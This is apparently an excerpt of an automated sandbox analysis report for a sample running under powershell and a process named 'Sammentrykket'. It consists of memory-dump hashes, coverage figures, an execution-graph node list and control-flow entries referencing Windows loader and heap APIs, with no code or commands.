                • Instruction ID: 4e49bfbc2a4b2407f1ecc3e059298603ac31580562075ce53b8576cf5c63533e
                • Opcode Fuzzy Hash: 529c3935e1db1d5e720cfd99a53417a6315aad145c667d1a306d4d66476779db
                • Instruction Fuzzy Hash: 23F06272404344AFE7108E16CCC4BA3FBA8EB51774F18C55AED585E282C279A884CAB1
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df8ddda5479c869bd40fce042e46d5188bbba2f1ac003f516a59d6a99d6fd1f4
                • Instruction ID: 1361e6a2ed5f018ebfb2e2fe7548ac9ea4a192d0345665bb162af7090e20e81c
                • Opcode Fuzzy Hash: df8ddda5479c869bd40fce042e46d5188bbba2f1ac003f516a59d6a99d6fd1f4
                • Instruction Fuzzy Hash: 68F0B435B00109DFCB14CBD8D884AEEF3B2FF88324B25825DD955A7650CB36AC62CB50
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 03a1988401fde4e90035684fc329c14c92c3efb51900ca9af078d647d8e2dc9a
                • Instruction ID: 154246760dcd926471fddc9facc83065c8b2c63e22a36c9d6bcacd27672086ff
                • Opcode Fuzzy Hash: 03a1988401fde4e90035684fc329c14c92c3efb51900ca9af078d647d8e2dc9a
                • Instruction Fuzzy Hash: 1DF0B235A001099FDB14CB99D890AEEF7B1FF88324F248159E515A72A1C736AC62CB61
                Memory Dump Source
                • Source File: 00000002.00000002.76789046263.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba589f22d2485f9b36bef8d60bb4a44a0e018570408adea578a21ec4ad28ab0f
                • Instruction ID: 45edbafd5f73b4662516a3d4a0e6be50c8239140b1ce2a19512f83cb40938f8f
                • Opcode Fuzzy Hash: ba589f22d2485f9b36bef8d60bb4a44a0e018570408adea578a21ec4ad28ab0f
                • Instruction Fuzzy Hash: EFA001742021009B9A45EA58C995816B761AB85319728C499E9998B36ACB67E9039B80
                Memory Dump Source
                • Source File: 00000002.00000002.76781964796.00000000033C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_33c0000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3a878bfa6045f772f3922cbf5eb46653fe850ca74a7ec9af481814df14a8954d
                • Instruction ID: f1a6989d750ac4d4df53c498d0f5d58cc5c5177f5e274c2ff534ee1f000e3e5a
                • Opcode Fuzzy Hash: 3a878bfa6045f772f3922cbf5eb46653fe850ca74a7ec9af481814df14a8954d
                • Instruction Fuzzy Hash: 31916C71E102899FDB10CFA9D9C479DBBF2AF88714F18812DE814AB254EB749C45CF91
                Memory Dump Source
                • Source File: 00000002.00000002.76781565730.00000000032BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 032BD000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_32bd000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 76f2a2907f65b73f3b8b1ef2c48d844e4a1b7d165682afc8400f001daf563f84
                • Instruction ID: 4320ae0054926ae5c9ee896ff09287e33cc7270b6aedd20e3a8a0bbe0a274c8f
                • Opcode Fuzzy Hash: 76f2a2907f65b73f3b8b1ef2c48d844e4a1b7d165682afc8400f001daf563f84
                • Instruction Fuzzy Hash: C5210672514340EFDB05DF14D9C0BA6BF75FB84324F2485A9E8090B246C776D496CB62

                Execution Graph

                Execution Coverage: 0.6%
                Dynamic/Decrypted Code Coverage: 100%
                Signature Coverage: 80.3%
                Total number of Nodes: 619
                Total number of Limit Nodes: 5
                execution_graph 8343 20949194 GetPEB 8348 20962bc0 LdrInitializeThunk 8343->8348 8345 209491f0 8346 2094921e 8345->8346 8349 20962bc0 LdrInitializeThunk 8345->8349 8348->8345 8349->8346 8754 20953194 8755 209531a9 8754->8755 8756 209531b7 8755->8756 8758 209531be 8755->8758 8761 209531f4 8758->8761 8759 2095324c GetPEB 8760 2095325f 8759->8760 8760->8756 8761->8759 8761->8760 8762 209927ee GetPEB 8761->8762 8763 209927fe 8762->8763 8763->8759 8367 2091a093 8368 2091a09c GetPEB 8367->8368 8369 2091a0ad 8367->8369 8368->8369 8370 20927290 8371 209274fe 8370->8371 8375 209272d1 8370->8375 8372 209816aa GetPEB 8377 209273ff 8372->8377 8373 209816c9 GetPEB 8374 209274f0 8373->8374 8374->8371 8384 209f5149 8374->8384 8375->8372 8375->8377 8377->8373 8377->8374 8378 20927406 8377->8378 8379 209816f2 GetPEB 8378->8379 8380 20927443 8378->8380 8379->8380 8383 20927451 8380->8383 8388 209f505b 8380->8388 8382 2098170c 8382->8382 8385 209f517b 8384->8385 8386 209f517f GetPEB 8385->8386 8387 209f518f 8385->8387 8386->8387 8387->8378 8389 209f507e 8388->8389 8390 209f5082 GetPEB 8389->8390 8391 209f5092 8389->8391 8390->8391 8391->8382 8878 2091f113 8880 2091f141 8878->8880 8879 2091f4ab 8881 2097dcca GetPEB 8879->8881 8889 2091f4b8 8879->8889 8880->8879 8894 2091f2a7 8880->8894 8902 2091f352 8880->8902 8916 2091f1a0 8880->8916 8883 2097dcd6 GetPEB 8881->8883 8881->8889 8882 2097dfa6 GetPEB 8884 2097dfb9 GetPEB 8882->8884 8883->8889 8885 2097dfce 8884->8885 8891 2091f342 8884->8891 8887 209df13e GetPEB 8885->8887 8886 2097e104 GetPEB 8888 2097e110 GetPEB 8886->8888 8886->8916 8887->8891 8888->8916 8890 2091f4e7 8889->8890 8911 2091f3ae 8889->8911 8895 2097dd77 GetPEB 8890->8895 8896 2091f514 8890->8896 8890->8916 8892 2097dfed GetPEB 8891->8892 8891->8902 8893 2097dff8 GetPEB 8892->8893 8892->8902 8893->8902 8894->8882 8894->8891 8897 2091f334 8894->8897 8894->8911 8894->8916 8898 2097dd8a GetPEB 8895->8898 8896->8898 8907 2091f51f 8896->8907 8897->8884 
8897->8891 8899 2097dd9d 8898->8899 8898->8907 8924 209df13e 8899->8924 8900 2091f391 8904 2097e077 GetPEB 8900->8904 8910 2091f39c 8900->8910 8901 2097e064 GetPEB 8901->8904 8902->8900 8902->8901 8905 2097e08c 8904->8905 8904->8910 8909 2097e095 GetPEB 8905->8909 8905->8910 8906 2097e0c5 GetPEB 8906->8911 8908 2097de0f GetPEB 8907->8908 8918 2091f588 8907->8918 8912 2097de1a GetPEB 8908->8912 8908->8918 8909->8910 8910->8906 8910->8911 8911->8886 8911->8916 8912->8918 8913 2091f595 8915 2097dee1 GetPEB 8913->8915 8921 2091f5a0 8913->8921 8914 2097dece GetPEB 8914->8915 8917 2097def6 8915->8917 8915->8921 8920 2097deff GetPEB 8917->8920 8917->8921 8918->8913 8918->8914 8919 2097df35 GetPEB 8922 2091f5b7 8919->8922 8920->8921 8921->8919 8921->8922 8922->8916 8923 2097df4e GetPEB 8922->8923 8923->8916 8925 209df163 8924->8925 8926 209df18a GetPEB 8925->8926 8927 209df19a 8925->8927 8926->8927 8927->8907 8364 20962b90 LdrInitializeThunk 8587 2091821b GetPEB 8588 2091823b 8587->8588 8589 209ab214 8593 209ab23b 8589->8593 8590 209ab2ab 8591 209ab343 8590->8591 8592 209ab333 GetPEB 8590->8592 8592->8591 8593->8590 8594 209ab290 GetPEB 8593->8594 8594->8590 8392 2099e289 8393 2099e2a7 8392->8393 8395 2099e2f8 8392->8395 8394 2099e359 GetPEB 8393->8394 8393->8395 8394->8395 8595 20945004 8596 2094502f 8595->8596 8599 20945074 8595->8599 8597 20945091 GetPEB 8596->8597 8596->8599 8600 209450a7 8597->8600 8598 209450bf GetPEB 8598->8599 8600->8598 8600->8599 8764 20924180 8765 20924190 8764->8765 8766 209242a4 8764->8766 8765->8766 8767 209241a5 GetPEB 8765->8767 8767->8766 8768 209241b8 GetPEB 8767->8768 8769 209241db 8768->8769 8770 209800a4 GetPEB 8769->8770 8771 20924247 8769->8771 8770->8766 8396 20944080 8397 20944094 8396->8397 8398 209440aa 8396->8398 8398->8397 8400 2091c2b0 8398->8400 8401 2091c2bd 8400->8401 8403 2091c2e1 8400->8403 8402 20979dba GetPEB 8401->8402 8401->8403 8402->8403 8403->8397 8928 20950100 8931 20950118 8928->8931 8930 20950114 8934 20950124 
8931->8934 8932 20990be2 GetPEB 8933 209501e8 8932->8933 8933->8930 8934->8932 8934->8933 8605 2096100e 8606 20961048 8605->8606 8611 20961190 8606->8611 8608 2096108d 8609 20961190 2 API calls 8608->8609 8610 209610d1 8608->8610 8609->8610 8612 209611a7 8611->8612 8613 20961265 8612->8613 8614 20961216 GetPEB 8612->8614 8613->8608 8615 20961229 8614->8615 8615->8613 8616 20961254 GetPEB 8615->8616 8616->8613 8772 2091918a 8773 2091919f 8772->8773 8775 209191c9 8772->8775 8774 209191f0 2 API calls 8773->8774 8773->8775 8774->8775 8775->8775 8935 2094510f 8936 2098b9ab 8935->8936 8937 20945147 8935->8937 8938 2098b9c3 GetPEB 8936->8938 8951 20945443 8936->8951 8937->8936 8939 20945164 8937->8939 8938->8951 8940 2094517d GetPEB 8939->8940 8941 20945195 8939->8941 8940->8941 8943 209451c6 GetPEB 8941->8943 8947 2094526c 8941->8947 8941->8951 8942 2098badc GetPEB 8945 20945455 8942->8945 8958 209451d7 8943->8958 8944 20945460 8945->8944 8946 2098bafb GetPEB 8945->8946 8946->8944 8948 2094529d GetPEB 8947->8948 8949 20945345 8947->8949 8947->8951 8962 209452ae 8948->8962 8950 20945376 GetPEB 8949->8950 8949->8951 8963 20945387 8950->8963 8951->8942 8951->8945 8952 2094524f 8952->8947 8954 2094525c GetPEB 8952->8954 8953 2094523d GetPEB 8953->8952 8954->8947 8955 20945316 GetPEB 8956 20945328 8955->8956 8956->8949 8957 20945335 GetPEB 8956->8957 8957->8949 8958->8951 8958->8952 8958->8953 8959 2098babc GetPEB 8959->8951 8960 2094542a 8960->8951 8961 20945433 GetPEB 8960->8961 8961->8951 8962->8951 8962->8955 8962->8956 8963->8951 8963->8959 8963->8960 8404 209f4080 8412 209f40a5 8404->8412 8405 209f43f1 8406 209f4187 GetPEB 8406->8412 8407 209f420c GetPEB 8407->8412 8408 209f41e4 GetPEB 8408->8412 8409 209f43ac GetPEB 8409->8412 8410 209f426a GetPEB 8410->8412 8411 209f438e GetPEB 8411->8412 8412->8405 8412->8406 8412->8407 8412->8408 8412->8409 8412->8410 8412->8411 8413 209f436b GetPEB 8412->8413 8413->8412 8414 2095b28a 8415 2095b2a3 8414->8415 8417 2095b2b7 
8414->8417 8418 20962b90 LdrInitializeThunk 8415->8418 8418->8417 8964 2092510d 8965 20925119 8964->8965 8966 20925187 8965->8966 8967 2092513e GetPEB 8965->8967 8967->8966 8968 20925151 8967->8968 8968->8966 8970 2095d0f0 8968->8970 8971 2095d101 8970->8971 8975 2095d135 8970->8975 8972 2095d107 GetPEB 8971->8972 8971->8975 8973 2095d116 8972->8973 8972->8975 8974 209989ba GetPEB 8973->8974 8973->8975 8974->8975 8975->8966 8619 209dc03d 8622 209dc068 8619->8622 8620 209dc08c 8622->8620 8623 209db0af 8622->8623 8625 209db0d9 8623->8625 8626 209db0e2 8623->8626 8624 209db313 GetPEB 8624->8625 8625->8622 8626->8624 8626->8625 8419 209fb2bc GetPEB 8422 209fb306 8419->8422 8420 209fb54c 8421 209fb53b GetPEB 8421->8420 8423 209fb508 8422->8423 8424 209fb3c8 GetPEB 8422->8424 8423->8420 8423->8421 8426 209fb3ed 8424->8426 8425 209fb4f7 GetPEB 8425->8423 8426->8423 8426->8425 8629 20950030 8632 20950044 8629->8632 8631 20950040 8633 2095005c 8632->8633 8635 209500a3 8632->8635 8634 2095008f GetPEB 8633->8634 8633->8635 8634->8635 8635->8631 8636 20968230 8637 20968250 8636->8637 8638 20968270 8637->8638 8639 20968266 RtlDebugPrintTimes 8637->8639 8639->8638 8640 209e6035 8641 209e605d 8640->8641 8643 209e60f3 8640->8643 8642 209e60d0 RtlDebugPrintTimes 8641->8642 8641->8643 8642->8643 8780 2091e1a0 8781 2091e1ac 8780->8781 8783 2091e1ec 8780->8783 8782 2097d71e RtlDebugPrintTimes 8781->8782 8781->8783 8784 2097d73b 8782->8784 8784->8784 8785 2095e1a4 8787 2095e1d9 8785->8787 8786 2095e1ed GetPEB 8790 2095e201 8786->8790 8787->8786 8788 2095e310 8787->8788 8789 2095e2fe GetPEB 8789->8788 8790->8788 8790->8789 8976 20928120 8977 20981a7f 8976->8977 8978 2092814b 8976->8978 8977->8978 8979 20981aa9 RtlDebugPrintTimes 8977->8979 8979->8978 8350 209600a5 8351 209600dd 8350->8351 8357 20960247 8350->8357 8352 209601dd GetPEB 8351->8352 8353 209601e6 8351->8353 8351->8357 8352->8353 8353->8357 8358 20962d10 LdrInitializeThunk 8353->8358 8355 20960218 8355->8357 8359 209f32c9 
8355->8359 8358->8355 8360 209ca810 8359->8360 8361 209f32e3 GetPEB 8360->8361 8362 209f32f6 8361->8362 8362->8357 8791 2094b1a0 8792 2094b1af 8791->8792 8795 2094b1e0 8792->8795 8794 2094b1d1 8797 2094b233 8795->8797 8802 2094b568 8795->8802 8796 2094b2ac GetPEB 8800 2094b2c2 8796->8800 8797->8796 8797->8800 8797->8802 8798 2094b5c0 GetPEB 8803 2094b5d7 8798->8803 8799 2094b550 8799->8798 8799->8802 8800->8799 8801 2094b45d GetPEB 8800->8801 8804 2094b471 8801->8804 8802->8794 8803->8802 8805 2094b6f1 GetPEB 8803->8805 8806 2094b6df GetPEB 8803->8806 8804->8799 8804->8802 8808 2094b53c GetPEB 8804->8808 8809 2094b52a GetPEB 8804->8809 8805->8802 8807 2094b6ed 8806->8807 8807->8805 8808->8799 8810 2094b538 8809->8810 8810->8808 8644 2095e022 8645 20961190 2 API calls 8644->8645 8646 2095e065 8645->8646 8435 209cf0a5 8436 209cf0b1 8435->8436 8437 209cf0c9 RtlDebugPrintTimes 8436->8437 8439 209cf0e3 8436->8439 8438 209cf0de 8437->8438 8439->8438 8440 209cf350 GetPEB 8439->8440 8445 209cf153 8439->8445 8440->8438 8441 209cf35b GetPEB 8440->8441 8441->8438 8442 209cf241 GetPEB 8443 209cf2be 8442->8443 8444 209cf252 8442->8444 8443->8438 8447 209cf2f9 GetPEB 8443->8447 8446 209cf257 GetPEB 8444->8446 8450 209cf271 8444->8450 8445->8438 8445->8442 8446->8450 8448 209cf304 GetPEB 8447->8448 8447->8450 8448->8450 8449 209cf295 GetPEB 8449->8438 8450->8449 8451 209442af 8452 209442ca 8451->8452 8454 2098b45b 8451->8454 8453 209442db GetPEB 8452->8453 8452->8454 8456 209442f1 8453->8456 8455 20944394 GetPEB 8457 209443a5 8455->8457 8456->8454 8456->8455 8980 20957128 8981 20994351 8980->8981 8984 20957138 8980->8984 8982 20994357 GetPEB 8981->8982 8983 20994366 8981->8983 8982->8983 8984->8981 8985 20957152 GetPEB 8984->8985 8985->8981 8986 20957165 8985->8986 8458 209192af 8459 209192c4 RtlDebugPrintTimes 8458->8459 8460 209192dd 8458->8460 8459->8460 8461 209192eb GetPEB 8460->8461 8462 209192ff 8460->8462 8461->8462 8651 20919050 8653 20919068 8651->8653 8652 209190a5 
8655 209190c8 8652->8655 8663 209190f8 8652->8663 8653->8652 8653->8655 8657 209191f0 8653->8657 8658 2097b8b6 GetPEB 8657->8658 8659 2091922c 8657->8659 8660 2097b8d6 8658->8660 8659->8652 8661 2097b913 GetPEB 8660->8661 8662 2097b924 8660->8662 8661->8662 8666 20919115 8663->8666 8669 20919181 8663->8669 8664 2097b850 GetPEB 8665 2097b85c GetPEB 8664->8665 8664->8669 8665->8669 8666->8664 8667 2097b813 GetPEB 8666->8667 8666->8669 8668 2097b81f GetPEB 8667->8668 8667->8669 8668->8669 8669->8655 8463 2093b0d0 8464 2093b0ed 8463->8464 8465 2093b10f GetPEB 8464->8465 8466 2093b132 8464->8466 8468 2093b179 8464->8468 8465->8466 8466->8468 8469 209301c0 GetPEB 8466->8469 8470 209301d1 8469->8470 8471 20984a6b 8469->8471 8470->8468 8471->8470 8472 20984a74 GetPEB 8471->8472 8472->8468 8670 20921051 8673 209210a3 8670->8673 8671 20921135 RtlDebugPrintTimes 8672 2092115d 8671->8672 8674 2097f397 GetPEB 8673->8674 8675 2097f385 GetPEB 8673->8675 8677 20921122 8673->8677 8674->8677 8676 20933bc0 8675->8676 8676->8674 8677->8671 8677->8672 8473 2095b0dd 8477 2095b117 8473->8477 8474 20996f09 RtlDebugPrintTimes 8476 20996f21 8474->8476 8475 2095b186 8476->8476 8477->8475 8477->8477 8478 20996d68 8477->8478 8480 2095b172 8477->8480 8478->8475 8479 20996dd1 RtlDebugPrintTimes 8478->8479 8479->8478 8480->8474 8480->8475 8987 209f3157 8989 209f3179 8987->8989 8988 209f319f GetPEB 8990 209f31b3 8988->8990 8989->8988 8993 209f325f 8989->8993 8991 209f31d3 GetPEB 8990->8991 8994 209f31fb 8990->8994 8991->8994 8992 209f3281 GetPEB 8992->8994 8993->8992 8993->8994 8995 2095415f GetPEB 8996 20954177 8995->8996 8998 20954194 8996->8998 8999 209541bb 8996->8999 9000 209541e1 8999->9000 9001 20954235 GetPEB 9000->9001 9004 209542f2 9000->9004 9002 2095424c 9001->9002 9003 20954275 GetPEB 9002->9003 9002->9004 9005 20954289 9003->9005 9004->8998 9005->9004 9006 20992e62 GetPEB 9005->9006 9006->9004 8481 2091b0c0 8484 2091b0d6 8481->8484 8483 2091b0d2 8485 2091b0e9 8484->8485 8493 2091b1ab 
8485->8493 8497 2095d060 8485->8497 8487 2091b0ff 8488 2097cb82 8487->8488 8489 2091b11b GetPEB 8487->8489 8491 2091b124 8487->8491 8490 2097cb9c GetPEB 8488->8490 8488->8493 8489->8491 8490->8493 8492 2091b13b GetPEB 8491->8492 8491->8493 8494 2091b14f 8492->8494 8493->8483 8494->8488 8495 2091b15a 8494->8495 8495->8493 8496 2091b198 GetPEB 8495->8496 8496->8493 8498 2095d074 8497->8498 8500 2095d09b 8497->8500 8501 20968170 8498->8501 8500->8487 8502 20968190 8501->8502 8503 2096819e RtlDebugPrintTimes 8502->8503 8504 209681a8 8502->8504 8503->8504 8504->8500 8505 209432c5 8507 209432de 8505->8507 8506 20943323 8507->8506 8508 20943312 GetPEB 8507->8508 8508->8506 8815 209181c0 8816 209181d2 8815->8816 8816->8816 8817 209181e7 8816->8817 8819 209181eb 8816->8819 8822 209181fa 8819->8822 8823 2097b300 8819->8823 8820 209181ff GetPEB 8821 20918210 8820->8821 8821->8817 8822->8820 8823->8823 9007 209b314a 9008 209b319b 9007->9008 9009 209b31a4 GetPEB 9008->9009 9010 209b31b4 9008->9010 9009->9010 9011 209b31c9 GetPEB 9010->9011 9012 209b31d9 9010->9012 9011->9012 9013 209b3232 GetPEB 9012->9013 9014 209b325e 9012->9014 9015 209b3241 9012->9015 9013->9015 9015->9014 9016 209b324f GetPEB 9015->9016 9016->9014 8824 209351c0 8825 2093523e 8824->8825 8826 20935306 8825->8826 8830 2093559f 8825->8830 8834 20935508 8825->8834 8827 20935399 GetPEB 8826->8827 8828 20986b1d GetPEB 8826->8828 8833 209353ad 8826->8833 8827->8833 8829 20986b31 8828->8829 8829->8827 8831 209531be 2 API calls 8830->8831 8830->8834 8831->8830 8832 209354f7 GetPEB 8832->8834 8833->8832 8833->8834 8835 20986bd7 GetPEB 8833->8835 8836 20986be8 8835->8836 8836->8832 8678 20929046 8679 20929055 8678->8679 8684 209290fd 8679->8684 8688 2093a170 8679->8688 8681 2092913b 8682 20982345 RtlDebugPrintTimes 8681->8682 8681->8684 8685 20982368 8682->8685 8683 20982465 RtlDebugPrintTimes ReleaseActCtx 8683->8684 8685->8684 8686 2093a170 RtlDebugPrintTimes 8685->8686 8687 209823e7 8685->8687 8686->8687 8687->8683 
8687->8684 8691 2093a195 8688->8691 8689 2093a387 8689->8681 8690 2093a5a1 RtlDebugPrintTimes 8690->8689 8691->8689 8691->8690 8509 209532c0 8511 209532d7 8509->8511 8514 20953370 8509->8514 8510 2099283a GetPEB 8510->8514 8512 2095331b GetPEB 8511->8512 8513 20953332 8511->8513 8511->8514 8512->8513 8513->8510 8513->8514 9017 2091a147 9023 2091a1a0 9017->9023 9018 2097c1e0 9019 2097c1e4 GetPEB 9018->9019 9020 2091a1d1 9018->9020 9019->9020 9021 2097c0e2 GetPEB 9021->9023 9022 2097c0d1 GetPEB 9022->9023 9023->9018 9023->9020 9023->9021 9023->9022 8694 20927072 8702 20927095 8694->8702 8695 209270f0 8696 209270fa 8695->8696 8697 20981602 8695->8697 8708 20927007 8696->8708 8700 20981619 8697->8700 8701 20981609 RtlDebugPrintTimes 8697->8701 8698 209815ac GetPEB 8705 20927122 8698->8705 8701->8700 8702->8698 8704 209270ea 8702->8704 8702->8705 8703 20927104 8704->8695 8706 209815ed RtlDebugPrintTimes 8704->8706 8705->8704 8707 209815d8 RtlDebugPrintTimes 8705->8707 8706->8695 8707->8704 8710 2092701d 8708->8710 8709 2092703b 8709->8703 8710->8709 8713 2094f1f0 8710->8713 8712 20978f22 8712->8712 8714 2094f21f 8713->8714 8715 2098fe72 GetPEB 8714->8715 8716 2094f22c 8714->8716 8715->8716 8717 2094f237 8716->8717 8718 2098fea5 GetPEB 8716->8718 8717->8712 8718->8717 8837 209301f1 8838 20930217 8837->8838 8839 20984a81 8837->8839 8838->8839 8844 2093025c GetPEB 8838->8844 8840 20930277 8839->8840 8841 20984aa1 GetPEB 8839->8841 8842 20930285 8840->8842 8843 20984ab4 GetPEB 8840->8843 8841->8840 8843->8842 8844->8839 8844->8840 8719 20926074 8721 2092607e 8719->8721 8720 20980a35 GetPEB 8722 20980a53 8720->8722 8721->8720 8724 20926121 8721->8724 8723 20980a7d GetPEB 8722->8723 8722->8724 8723->8724 8515 2091c0f6 8517 2091c10d 8515->8517 8516 2091c11c 8517->8516 8518 2097d43a GetPEB 8517->8518 8518->8516 8845 209e61f9 RtlDebugPrintTimes 8846 209e6229 8845->8846 8519 209302f9 8520 20930324 8519->8520 8521 20984ad9 GetPEB 8520->8521 8522 20930331 8520->8522 8521->8522 8523 
[Module-level control-flow graph: edge list omitted. Function entry points listed: 20930341, 20926179, 2097717a, 209e70f1, 209fa1f0, 209172e0, 20917060, 2092a2e0, 209282e0, 209291e5, 209ab1e2 (calls 20962b90 LdrInitializeThunk), 209c9060, 2091d2ec; APIs referenced: GetPEB, RtlDebugPrintTimes, LdrInitializeThunk.]

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 3 209634e0-209634ec LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: bdd4ef27ea98ca05895f92b7864e81221adb7cac9a3da09a8e4e505971b361ae
                • Instruction ID: ffd99f9d2fdcf6e69668d4e4eb88ee7665a6041fc8895052d5a1e9730a21a9c8
                • Opcode Fuzzy Hash: bdd4ef27ea98ca05895f92b7864e81221adb7cac9a3da09a8e4e505971b361ae
                • Instruction Fuzzy Hash: 8390027264520402D72062994654757102547D0201FA1C815A0624569DD7A5895175A3

                Control-flow Graph

                control_flow_graph 0 20962b90-20962b9c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: a6a72f8be1fd0d8f89be369b96b8538f1dc5810f8844f78ccf719a0b474a0e6b
                • Instruction ID: b28dbb0757fd69f48ce9c818dd2e0d2558e82c09277aa86f2b77325a4193c624
                • Opcode Fuzzy Hash: a6a72f8be1fd0d8f89be369b96b8538f1dc5810f8844f78ccf719a0b474a0e6b
                • Instruction Fuzzy Hash: 9990027224118802D7306299854479B002547D0301F95C815A4624659DD6A588917122

                Control-flow Graph

                control_flow_graph 1 20962bc0-20962bcc LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: ac6cf05df8e66f36b74d58c4af927e18dbe606acfc2379c22410abde8716304c
                • Instruction ID: 20ad34b6ffac53c4ed8691dac6a8b92d324ef15db8800b1865c6c5d454183603
                • Opcode Fuzzy Hash: ac6cf05df8e66f36b74d58c4af927e18dbe606acfc2379c22410abde8716304c
                • Instruction Fuzzy Hash: 1290027224110402D72066D95548697002547E0301F91D415A5224556ED67588917132

                Control-flow Graph

                control_flow_graph 2 20962d10-20962d1c LdrInitializeThunk
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: c93d195562f519fb85bb46c7a4166730c70b90bdb69486d6da41118171fc698c
                • Instruction ID: 3d06ee00e40b507f3ce4f80b1a8f3529a3688c4d911fd9eb453a40d04a4036b0
                • Opcode Fuzzy Hash: c93d195562f519fb85bb46c7a4166730c70b90bdb69486d6da41118171fc698c
                • Instruction Fuzzy Hash: 1190027224110413D73162994644757002947D0241FD1C816A0624559DE6668952B122

                Control-flow Graph

                control_flow_graph 4 209c9060 [basic-block edge list omitted; blocks in this function call 20968f40, 20964b50, 209c98aa, 209e92ab, 209cd7e5, 209ca388, 209c8093 and the APIs GetPEB and RtlDebugPrintTimes]
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: $ $0
                • API String ID: 3446177414-3352262554
                • Opcode ID: 874dfe2b314600de1fa804dd1f6cbb450a7f7f89caa78bb448c32c34c940e6ab
                • Instruction ID: a00ff4ead2ac9a50eeb3c0094b4987c8b870d691bab6416a88643acfc810f3e5
                • Opcode Fuzzy Hash: 874dfe2b314600de1fa804dd1f6cbb450a7f7f89caa78bb448c32c34c940e6ab
                • Instruction Fuzzy Hash: EC3215B1A083818FD350CFA8C888B5BBBE5BF88344F04496EF59A87251D779D949CB53

                Control-flow Graph

                control_flow_graph 343 209cf0a5 [basic-block edge list omitted; blocks in this function call 20977be4, 20917662, 209cf3f9, 2091b910, 2092fed0, 209d0835, 20935d90, 209d0d24, 209dd646, 20953ae9, 2094fdb9, 209c823a and the APIs GetPEB and RtlDebugPrintTimes]
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.77599512264.00000000208F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 208F0000, based on PE: true
                • Associated: 00000004.00000002.77599512264.0000000020A19000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000004.00000002.77599512264.0000000020A1D000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_208f0000_Sammentrykket.jbxd
                Similarity
                • API ID: DebugPrintTimes
                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                • API String ID: 3446177414-1745908468
